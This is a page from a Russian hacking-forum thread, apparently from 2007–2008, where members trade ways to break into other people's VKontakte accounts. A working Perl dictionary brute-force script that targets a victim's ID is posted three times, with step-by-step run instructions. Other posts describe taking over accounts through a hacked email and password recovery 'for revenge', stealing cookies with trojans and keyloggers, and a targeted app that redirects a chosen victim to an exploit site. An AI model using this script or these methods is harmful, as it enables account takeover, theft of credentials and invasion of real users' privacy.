Форумы  Правила форума  Сегодняшние посты 
Зарегистрироваться  Вход  Мой профиль  Входящие  Адресная книга  Моя подписка  Мои форумы  Выход
Текстовая версия  Список пользователей  Карта  Top-100 пользователей  Календари  Ticket List  Фото галерея
ПОИСК  FAQ 
RSS:  20 последних сообщений форума 20 последних топиков форума

VKONTAKTE.RU: ищем уязвимости, делимся опытом

 
Посмотреть связанные обсуждения: (в этом форуме | во всех форумах)

Зашли как: Guest
Пользователи, просматривающие топик: none
  Версия для печати
Все форумы >> [Взлом] >> В Сети >> VKONTAKTE.RU: ищем уязвимости, делимся опытом Страниц: [1] 2 3 4 5   след >   >>
Имя
Сообщение << Старые топики   Новые топики >>
VKONTAKTE.RU: ищем уязвимости, делимся опытом - 31.07.2007 2:42:59  1 голосов
voody


Сообщений: 955
Оценки: 0
Присоединился: 06.02.2005
Откуда: Санкт-Петербург
Сайт vkontakte.ru на данный момент является чуть ли не самым известным сайтом для общения студентов и школьников. Я зарегистрировался на нем пару месяцев назад и нашел там почти всех своих бывших одноклассников и просто людей, с которыми я раньше общался, но потом по каким-то причинам потерял с ними связь.

Я знаю, что где-то пол года назад (на том же сайте, в какой-то группе о ней было написано) там была уязвимость, которая позволяла любому человеку, знающему ID пользователя, зайти в его аккаунт. Нужно было подправить в кукисах параметры remixid и remixemail на те, что были у пользователя и все, аккаунт твой. Но сейчас туда ввели еще и remixpass - хэш пароля. После этого, использовать уязвимость не представлялось возможным. Нет, был случай, когда я дал одному человеку троян, украл кукисы с винча и подставил значения, но это был взлом компьютера пользователя, а не сайта.

Зачем я все это пишу: я предлагаю вместе искать уязвимости на этом сайте и выкладывать свои результаты сюда. Не обязательно пытаться ломать весь сайт. Во-первых, это сложно и занимает много времени. Во-вторых, если кто его и сломает - вряд ли поделиться информацией о том, как он это сделал (хотя, х.з., бывают и добрые люди). Я сейчас говорю, допустим, об XSS, или, о чем-нибудь в этом роде. Пишите сюда, кто заинтересован. Можно сайт вместе поковырять. Я думаю, что эта тема будет интересна достаточно большому кругу людей.


Post #: 1
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 31.07.2007 18:17:13   
cataha01

Сообщений: 122
Оценки: 0
Присоединился: 12.03.2006
на чот тут есть хз http://forum.antichat.ru/thread45578.html

(в ответ на voody)
Post #: 2
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 31.07.2007 23:58:25   
voody


Сообщений: 955
Оценки: 0
Присоединился: 06.02.2005
Откуда: Санкт-Петербург
Спасибо за ссылку, интересно. Проверил, работает ли метод с заменой e-mail'а на произвольный, оказалось, что да. Заменил свой e-mail в куках, перезагрузил страницу - я до сих пор был в своем аккаунте. С одной этой уязвимостью аккаунт, конечно, не вскроешь, но то, что не нужно узнавать адрес ящика, а нужен только пароль, уже радует. С флудером (тем, что в конце описан, с первым все более-менее ясно) пока не разбирался. Я Perl'а не знаю, было бы на PHP ... Вообщем, кто-то откликнулся, уже хорошо.

Народ, еще мысли есть? Может, кто XSS'ку найдет? Я, пока, что, их не видел, может, плохо искал.

(в ответ на cataha01)
Post #: 3
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 01.08.2007 1:14:58   
nutsbutters

Сообщений: 6
Оценки: 0
Присоединился: 31.07.2007
в контатке кстати есть группа, по поиску уязвимостей в проекте

кажется <sсriрt>alert('xak')</sсriрt> или как то так называется :)

(в ответ на voody)
Post #: 4
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 01.08.2007 20:39:19   
asylum


Сообщений: 431
Оценки: 0
Присоединился: 30.05.2006
Откуда: Палата № 6
И вроде как на этом движке, на этой неделе дыру нашли

(в ответ на nutsbutters)
Post #: 5
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 13.01.2008 7:36:07   
voody


Сообщений: 955
Оценки: 0
Присоединился: 06.02.2005
Откуда: Санкт-Петербург
Поднимаю тему. Может, кто-нибудь что-то новое нашел. Я пока ничего найти не могу.

(в ответ на asylum)
Post #: 6
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 04.06.2008 2:19:45   
Flight

Сообщений: 10
Оценки: 0
Присоединился: 06.01.2008
Откуда: Г.Воркута
http://q-zar.livejournal.com/151187.html
Вот заходите почитайте статейку!! наверное всем будет интересна!!!

(в ответ на voody)
Post #: 7
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 04.06.2008 2:38:55   
Flight

Сообщений: 10
Оценки: 0
Присоединился: 06.01.2008
Откуда: Г.Воркута
[link=http://obrute.info/site/vkontakteru-brut-final/#]view plain[/link][link=http://obrute.info/site/vkontakteru-brut-final/#]copy to clipboard[/link][link=http://obrute.info/site/vkontakteru-brut-final/#]print[/link][link=http://obrute.info/site/vkontakteru-brut-final/#]?[/link]#!/usr/bin/perl    use IO::Socket;  use MD5;  use threads;  use threads::shared;  my @pass : shared;    ######################################  # C!klodoL  # vkontakte.ru bruteforce with multi-threads  ######################################  $dic = 'passl.txt';  #словарь паролей  $id = 111111;  #id цели  $mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40  $threads = 4;  #количество потоков  ######################################    open (pass, "<$dic");    next:  @pass ="" pass();    for(0..$threads) {$trl[$_] ="" threads->create(\&Brut, $_);}  for(@trl) { $_->join; }    sub Brut  {    while (@pass){    $pass = shift @pass;    $md5 = MD5->hexhash($pass);  $sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80);  print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n".  "Host: vkontakte.ru\r\n".  "Accept: */*\r\n".  "Content-Type: application/x-www-form-urlencoded\r\n".  "User-Agent: Mozillo\r\n".  "Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".  "Connection: close\r\n\r\n";  $answ = <$sock>;  close $sock;  print "$pass  $answ";  if ($answ =~ /302/){  open (good, '>>good.txt');  print good "$id:$pass:$md5\n";  print "$id:$pass:$md5\n";  close good;  exit;}  }    }    goto Next;    sub pass  {  my (@mas);  while (<pass>){  push @mas, $_;  last if (@mas == 400);  }  chomp @mas;  return @mas;  } 

$dic = ‘passl.txt’; #словарь паролей
$id = 111111; #id цели
$mail = ‘mail%40mail.com’; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков
для начала:
1. тебе нужна прога ActivePerl 5.10.0.1001 я юзаю её.
2. потом из первого поста копируешь себе текст в текстовый файл… и меняешь id жертвы на нужное тебе.
3. переименуй файл из primer.txt в primer.pl
4. туда где лежит этот файл, скопируй файл со словарём, в данном примере это passl.txt
5. запускай файл, и радуйся…
6. создастся good.txt, где и будет твой пасс.

http://www.softportal.com/get-70-activeperl.html ------ ActivePerl 5.10.0.1001
Я это брал с какогото сайта уже не помню но отзывы были 100%!!!!
Всем удачи!!!

(в ответ на Flight)
Post #: 8
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 04.06.2008 2:41:04   
Flight

Сообщений: 10
Оценки: 0
Присоединился: 06.01.2008
Откуда: Г.Воркута
Чёт оно криво вставилось!!! Если кто хочет получить стучите в асю 356-811-887!! Дам подробную инфу!!

(в ответ на Flight)
Post #: 9
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 05.06.2008 14:03:28   
_~eXe~_

Сообщений: 14
Оценки: 0
Присоединился: 05.06.2008
Есть способ, он только для каждого пользователя отдельно, достаточно лишь знать  мыло жертвы, "в контакте" есть функция восстановления пароля(как и на всех сайтах такого рода) но дело в том что система не выдаёт нам новый пароль, а она присылает старый. Кто не понял в чём фишка, пишу дальше... Нам нужно взломать мыло жертвы(каждый наверняка знает какой прогой это можно сделать) сломали мыло, заходим в почту(новые письма не читаем, а то пропалят) заходим "в контакт" вбиваем взломанное мыло, и восстанавливаем пароль на это мыло, получаем письмецо, быстренько списываем полученные данные, удаляем письмо, выходим. Вот и всё. Этот способ больше подходит для тех кто хочет кому то отомстить

(в ответ на Flight)
Post #: 10
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 05.06.2008 15:42:19   
Jarull


Сообщений: 360
Оценки: 0
Присоединился: 04.04.2007
Откуда: Встречайте прямо из Москвы
мдаааа идея со взломом мыла меня ваще поразила......ну попробуй взломай мыльцо........
кстати то что дано на античате канешно класс но много чего уже прикрыли.......

(в ответ на _~eXe~_)
Post #: 11
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 06.06.2008 17:14:53   
_~eXe~_

Сообщений: 14
Оценки: 0
Присоединился: 05.06.2008
Могу выложить для всего этого проги)))ну эт если не найдёте...))) а так вот сайтец с отличным софтом для любого взлома   http://litaretti.ucoz.ru

(в ответ на Jarull)
Post #: 12
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 06.06.2008 18:02:28   
[ TRaY ]


Сообщений: 930
Оценки: 6
Присоединился: 22.03.2008
Откуда: бомж
quote:

ORIGINAL: Flight

[link=http://obrute.info/site/vkontakteru-brut-final/#]view plain[/link][link=http://obrute.info/site/vkontakteru-brut-final/#]copy to clipboard[/link][link=http://obrute.info/site/vkontakteru-brut-final/#]print[/link][link=http://obrute.info/site/vkontakteru-brut-final/#]?[/link]#!/usr/bin/perl    use IO::Socket;  use MD5;  use threads;  use threads::shared;  my @pass : shared;    ######################################  # C!klodoL  # vkontakte.ru bruteforce with multi-threads  ######################################  $dic = 'passl.txt';  #словарь паролей  $id = 111111;  #id цели  $mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40  $threads = 4;  #количество потоков  ######################################    open (pass, "<$dic");    next:  @pass ="" pass();    for(0..$threads) {$trl[$_] ="" threads->create(\&Brut, $_);}  for(@trl) { $_->join; }    sub Brut  {    while (@pass){    $pass = shift @pass;    $md5 = MD5->hexhash($pass);  $sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80);  print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n".  "Host: vkontakte.ru\r\n".  "Accept: */*\r\n".  "Content-Type: application/x-www-form-urlencoded\r\n".  "User-Agent: Mozillo\r\n".  "Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".  "Connection: close\r\n\r\n";  $answ = <$sock>;  close $sock;  print "$pass  $answ";  if ($answ =~ /302/){  open (good, '>>good.txt');  print good "$id:$pass:$md5\n";  print "$id:$pass:$md5\n";  close good;  exit;}  }    }    goto Next;    sub pass  {  my (@mas);  while (<pass>){  push @mas, $_;  last if (@mas == 400);  }  chomp @mas;  return @mas;  } 

$dic = ‘passl.txt’; #словарь паролей
$id = 111111; #id цели
$mail = ‘mail%40mail.com’; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков
для начала:
1. тебе нужна прога ActivePerl 5.10.0.1001 я юзаю её.
2. потом из первого поста копируешь себе текст в текстовый файл… и меняешь id жертвы на нужное тебе.
3. переименуй файл из primer.txt в primer.pl
4. туда где лежит этот файл, скопируй файл со словарём, в данном примере это passl.txt
5. запускай файл, и радуйся…
6. создастся good.txt, где и будет твой пасс.

http://www.softportal.com/get-70-activeperl.html ------ ActivePerl 5.10.0.1001
Я это брал с какогото сайта уже не помню но отзывы были 100%!!!!
Всем удачи!!!

Баян, на форуме не первый раз постится, и мог бы если уж на то пошло, норм выложить, а не кракозяблины...

quote:

ORIGINAL: _~eXe~_

Могу выложить для всего этого проги)))ну эт если не найдёте...))) а так вот сайтец с отличным софтом для любого взлома   http://litaretti.ucoz.ru

ыы) реклама=бан

Зачем вам вообще этот контакт нужен? тупо посмотреть закрытые фотки и видео? ну получите базу мыл примерно в 15млн, из которых 75-80% валид((
На самом деле, контакт никакой особо ценной инфы не содержит... тем более соц сети разрушают мозг...

(в ответ на _~eXe~_)
Post #: 13
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 07.06.2008 1:40:50   
_~eXe~_

Сообщений: 14
Оценки: 0
Присоединился: 05.06.2008
Енто не реклама))))xD)) это просто ссылка)))), и я думаю первый раз обойдёмся предупреждением....))) а сайт хорош)))

(в ответ на [ TRaY ])
Post #: 14
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 07.06.2008 2:25:48   
_~eXe~_

Сообщений: 14
Оценки: 0
Присоединился: 05.06.2008
У меня есть такой банальный вопрос: как можно обойти вот эту защиту???? 
Ошибка

Страница скрыта

Пользователь предпочел скрыть эту страницу.

Назад

Кто хоть примеоно знает, плиз, отпишитесь!
P.S Заранее спасибо) 

< Сообщение отредактировано _~eXe~_ -- 07.06.2008 2:27:56 >

(в ответ на _~eXe~_)
Post #: 15
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 12.06.2008 18:49:59   
npixel4

Сообщений: 33
Оценки: 0
Присоединился: 08.06.2008
ну лично как я узнавал...то никак...всё ухе прикрыли(((

(в ответ на _~eXe~_)
Post #: 16
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 13.06.2008 22:20:24   
_~eXe~_

Сообщений: 14
Оценки: 0
Присоединился: 05.06.2008
Ну вообще то я уже нашел прогу с помощью  которой можно смотреть всё кроме "стены" в контакте не добавляясь в друзья.
P.S Прога называется VRazvedke, вот ссыла на скачивание : http://www.rapidshare.ru/702461
(Если у кого возникнут вопросы по пользованию прогой, пишите в личку)

< Сообщение отредактировано _~eXe~_ -- 13.06.2008 22:22:23 >

(в ответ на npixel4)
Post #: 17
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 13.06.2008 22:26:44   
Chrek625

Сообщений: 191
Оценки: 0
Присоединился: 09.01.2008
quote:

ORIGINAL: _~eXe~_

Ну вообще то я уже нашел прогу с помощью  которой можно смотреть всё кроме "стены" в контакте не добавляясь в друзья.
P.S Прога называется VRazvedke, вот ссыла на скачивание : http://www.rapidshare.ru/702461
(Если у кого возникнут вопросы по пользованию прогой, пишите в личку)

Слушай что то подозрительно а не склеяна ли программа с каким то вирусом?

(в ответ на _~eXe~_)
Post #: 18
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 14.06.2008 0:03:15  1 голосов
Jarull


Сообщений: 360
Оценки: 0
Присоединился: 04.04.2007
Откуда: Встречайте прямо из Москвы
Ну вот возьми и проверь, поставь на виртуальную машину и снифером чекай, если идут куда пакеты значит трой, а если постараешься то узнаешь и куда эти отчеты летят.......

(в ответ на Chrek625)
Post #: 19
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 14.06.2008 0:05:07   
maiel

Сообщений: 64
Оценки: 0
Присоединился: 15.12.2006
Откуда: БАТУМИ
Зачем вредить народу??

(в ответ на Jarull)
Post #: 20
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 14.06.2008 0:31:02   
Chrek625

Сообщений: 191
Оценки: 0
Присоединился: 09.01.2008
quote:

ORIGINAL: Jarull

Ну вот возьми и проверь, поставь на виртуальную машину и снифером чекай, если идут куда пакеты значит трой, а если постараешься то узнаешь и куда эти отчеты летят.......

Да нууу нафиг а я то думал что да как мне сделать я высказал своё мнение а не мпрашивал...

(в ответ на maiel)
Post #: 21
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 16.06.2008 0:12:54   
_~eXe~_

Сообщений: 14
Оценки: 0
Присоединился: 05.06.2008
quote:

ORIGINAL: Chrek625

quote:

ORIGINAL: _~eXe~_

Ну вообще то я уже нашел прогу с помощью  которой можно смотреть всё кроме "стены" в контакте не добавляясь в друзья.
P.S Прога называется VRazvedke, вот ссыла на скачивание : http://www.rapidshare.ru/702461
(Если у кого возникнут вопросы по пользованию прогой, пишите в личку)

Слушай что то подозрительно а не склеяна ли программа с каким то вирусом?

Слушай!!! У тя чё башню снесло какой нафиг вирус!!! Наоборот выкладываешь хорошие вещи, а тут сразу выпендрос! Подозрительно!!!-НЕ КАЧАЙ, сиди и смотри как другие пользуются!!! А если бы он и был там! Руки что ли не там растут? Вирус удалить не сможешь?
Ну и народ пошел...

(в ответ на Chrek625)
Post #: 22
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 19.06.2008 22:38:58   
Zzzen

Сообщений: 6
Оценки: 0
Присоединился: 10.03.2008
Скрипт работает просто, используется простой bruteforce (перебор вариантов), в этом скрипте перебор паролей, которые расположены в файле. Человек с руками может сделать из этого скрипта более модифицированный вариант.

Так, что ловите.


#!/usr/bin/perl

use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;

######################################
# C!klodoL
# vkontakte.ru bruteforce with multi-threads
######################################
$dic = 'passl.txt'; #словарь паролей
$id = 111111; #id цели
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков
######################################

open (pass, "<$dic");

Next:
@pass = pass();

for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);}
for(@trl) { $_->join; }

sub Brut
{

while (@pass){

$pass = shift @pass;

$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80);
print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n".
"Host: vkontakte.ru\r\n".
"Accept: */*\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"User-Agent: Mozillo\r\n".
"Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".
"Connection: close\r\n\r\n";
$answ = <$sock>;
close $sock;
print "$pass $answ";
if ($answ =~ /302/){
open (good, '>>good.txt');
print good "$id:$pass:$md5\n";
print "$id:$pass:$md5\n";
close good;
exit;}
}

}

goto Next;

sub pass
{
my (@mas);
while (
){
push @mas, $_;
last if (@mas == 400);
}
chomp @mas;
return @mas;
}

Источник - форум Античата.ру

(в ответ на _~eXe~_)
Post #: 23
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 21.06.2008 15:30:25  1 голосов
_~eXe~_

Сообщений: 14
Оценки: 0
Присоединился: 05.06.2008
Скриптик не плохой, но ты сам подумай процент попадания, и тя с этим скриптом в бан лист сразу, ты не первый кто такую версию выкладывает, "в контакте" тоже не дураки сидят, и тем более брут-эт долго

(в ответ на Zzzen)
Post #: 24
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 21.06.2008 16:16:36   
_~eXe~_

Сообщений: 14
Оценки: 0
Присоединился: 05.06.2008
Вроде по взлому этой сети уже всё сказано, хотя осталься последний способ, это MD5. На их сервере идёт шиврование пароля мд5 которое прописано в куках, хорошо что уже нашлись люди которые могут взломать эту систему шифрования, на нашем сайте много о нём сказано, юзайте поиск.
P.S Если кто хочет подробное описание дейсвий взлома и ссылок, пищите.

(в ответ на _~eXe~_)
Post #: 25
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 21.06.2008 17:38:02   
[ TRaY ]


Сообщений: 930
Оценки: 6
Присоединился: 22.03.2008
Откуда: бомж
quote:

ORIGINAL: _~eXe~_

Вроде по взлому этой сети уже всё сказано, хотя осталься последний способ, это MD5. На их сервере идёт шиврование пароля мд5 которое прописано в куках, хорошо что уже нашлись люди которые могут взломать эту систему шифрования, на нашем сайте много о нём сказано, юзайте поиск.
P.S Если кто хочет подробное описание дейсвий взлома и ссылок, пищите.

Куки еще украсть нужно... А разве есть хсс на сайте вконтакте? О_о
Или каким способом предполагается похищать куки?

(в ответ на _~eXe~_)
Post #: 26
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 22.06.2008 1:41:12   
TurboXaker

 

Сообщений: 385
Оценки: 0
Присоединился: 23.05.2008
quote:

Или каким способом предполагается похищать куки?

http://www.viruslist.com/ru/weblog?discuss=207758696&return=1
в аналогичной статье было написано что вирус похищает куки => для похищения кук надо написать трой

< Сообщение отредактировано TurboXaker -- 22.06.2008 1:43:44 >


_____________________________

СМС с подделкой номера
Сапе система
Домены .RU за 300руб!

(в ответ на [ TRaY ])
Post #: 27
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 22.06.2008 1:57:32   
_~eXe~_

Сообщений: 14
Оценки: 0
Присоединился: 05.06.2008
quote:

ORIGINAL: [ TRaY ]

Куки еще украсть нужно... А разве есть хсс на сайте вконтакте? О_о
Или каким способом предполагается похищать куки?


Ну почему сразу хсс, есть же и куча других способов,  XSS в контакте не пашит, можно написать скрипт который будет тащить куку(исходников в инете куча, а там уже сам редакть как хочешь) написать скрипт, создать php страничку, и кинуть жертве в личку или на доску(на доске еще кто нить поймается xD) а еще проще кинуть ссылку на keyloger и нет проблем

(в ответ на [ TRaY ])
Post #: 28
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 22.06.2008 3:49:50   
webserfer2

Сообщений: 56
Оценки: 0
Присоединился: 23.05.2008
Откуда: Мурманск
Народ, вы бы попробовали использовать Flash и API Vkontakte - я думаю там дырок еще полно...

(в ответ на _~eXe~_)
Post #: 29
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 23.06.2008 2:06:50   
FreeKing

Сообщений: 31
Оценки: 0
Присоединился: 25.11.2007
Кстати, насчет API - там же, в отличие от простых ссылок на доске никаких "предупреждений о безопасности" не бывает - а прямо может редиректить на любой сайт...
Что если написать простое безобидное приложение, тип прикола красочного или там открытки, в котором отслеживать, кто его смотрит. И если это жертва - редиректить ее на сниффер, сайт с експлоитом etc. - дальше думаю все понятно, а если не жертва - то не выполнять никаких хакерских действий. Так ее не запалят админы контакта - и в то же время жертва попадет куда нам надо - а там уже хоть XSS, хоть что.

(в ответ на webserfer2)
Post #: 30
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 23.06.2008 13:18:25   
Derek_RED


Сообщений: 239
Оценки: 0
Присоединился: 16.03.2008
Откуда: Kazan sity
http://www.viruslist.com/ru/weblog?discuss=207758696&return=1 и кто это интересно? Вам помочь чем нить ?

(в ответ на FreeKing)
Post #: 31
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 24.06.2008 1:22:36   
_~eXe~_

Сообщений: 14
Оценки: 0
Присоединился: 05.06.2008
quote:

ORIGINAL: Derek_RED

Вам помочь чем нить ?

Да мы то можем и сами, а вот предложения по поводу взлома не помешают...))) Имеются таковые?

(в ответ на Derek_RED)
Post #: 32
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 24.06.2008 1:29:23   
_~eXe~_

Сообщений: 14
Оценки: 0
Присоединился: 05.06.2008
quote:

ORIGINAL: webserfer2

Народ, вы бы попробовали использовать Flash и API Vkontakte - я думаю там дырок еще полно...

Да, это тоже хороший вариант, написать безобидный скриптик, склеить его с Flash'ом и проблема решена, можно еще конеш лучше с кейлогером склеить-надёжнее и пасс можно будет узнать)

(в ответ на webserfer2)
Post #: 33
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 24.06.2008 4:02:43   
furiousangel


Сообщений: 1081
Оценки: 94
Присоединился: 28.05.2005
Откуда: /home/furang
Где-то на ачате я видел линк на PoC XSS на vkontakte. Это flash приложение на VkontakteAPI.

_____________________________


(в ответ на _~eXe~_)
Post #: 34
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 25.06.2008 18:13:23   
JTG


Сообщений: 1198
Оценки: 0
Присоединился: 05.03.2007
Откуда: ‮и онмет тут теапак аклотоп с
http://vkontakte.ru/apps.php?act=s&id=151392

(в ответ на furiousangel)
Post #: 35
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 26.06.2008 2:39:27   
trevan

Сообщений: 30
Оценки: 0
Присоединился: 29.04.2007
Через комп мой заходил друг на сайт можно вытащить его пороль из компа если можно то как?

(в ответ на JTG)
Post #: 36
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 26.06.2008 13:37:56  2 голосов
Jarull


Сообщений: 360
Оценки: 0
Присоединился: 04.04.2007
Откуда: Встречайте прямо из Москвы
quote:

Через комп мой заходил друг на сайт можно вытащить его пороль из компа если можно то как?


Читай форум......обо всем было сказано Биллион раз.....ну а если лень искать то вот те способ....берешь и скачиваешь программу Multi Password Recovery,запускаешь и она выдает тебе все пароли сохраненные на твоем компе.......за то что я сделал всю работу за тебя мож поставить +

(в ответ на trevan)
Post #: 37
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 27.06.2008 2:43:35  1 голосов
webserfer2

Сообщений: 56
Оценки: 0
Присоединился: 23.05.2008
Откуда: Мурманск
quote:

ORIGINAL: _~eXe~_
Да, это тоже хороший вариант, написать безобидный скриптик, склеить его с Flash'ом и проблема решена, можно еще конеш лучше с кейлогером склеить-надёжнее и пасс можно будет узнать)

На actionsсriрt реально что-то такое написать?

(в ответ на _~eXe~_)
Post #: 38
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 28.06.2008 18:29:53   
ZAmpol1T

Сообщений: 3
Оценки: 0
Присоединился: 28.06.2008
quote:

ORIGINAL: _~eXe~_

quote:

ORIGINAL: webserfer2

Народ, вы бы попробовали использовать Flash и API Vkontakte - я думаю там дырок еще полно...

Да, это тоже хороший вариант, написать безобидный скриптик, склеить его с Flash'ом и проблема решена, можно еще конеш лучше с кейлогером склеить-надёжнее и пасс можно будет узнать)


уже давно пофиксили, теперь ядовитый .swf блочится уже на стадии загрузки его на сервер

(в ответ на _~eXe~_)
Post #: 39
RE: VKONTAKTE.RU: ищем уязвимости, делимся опытом - 29.06.2008 1:32:07   
webserfer2

Сообщений: 56
Оценки: 0
Присоединился: 23.05.2008
Откуда: Мурманск
quote:

ORIGINAL: ZAmpol1T
уже давно пофиксили, теперь ядовитый .swf блочится уже на стадии загрузки его на сервер

А если сделать чтоб он его подгружал в процессе?
Вполне безобидная флешка)

(в ответ на ZAmpol1T)
Post #: 40
Страниц:   [1] 2 3 4 5   след >   >>
Все форумы >> [Взлом] >> В Сети >> VKONTAKTE.RU: ищем уязвимости, делимся опытом Страниц: [1] 2 3 4 5   след >   >>
Перейти к:





Новые сообщения Нет новых сообщений
Популярные с новыми сообщениями Популярные без новых сообщений
Заблокированные с новыми сообщениями Заблокированные без сообщений
 Новое сообщение
 Ответ
 Новое голосование
 Оставить голос
 Удалить мой пост
 Удалить мое обсуждение
 Оценить пост









Rambler's Top100
0.234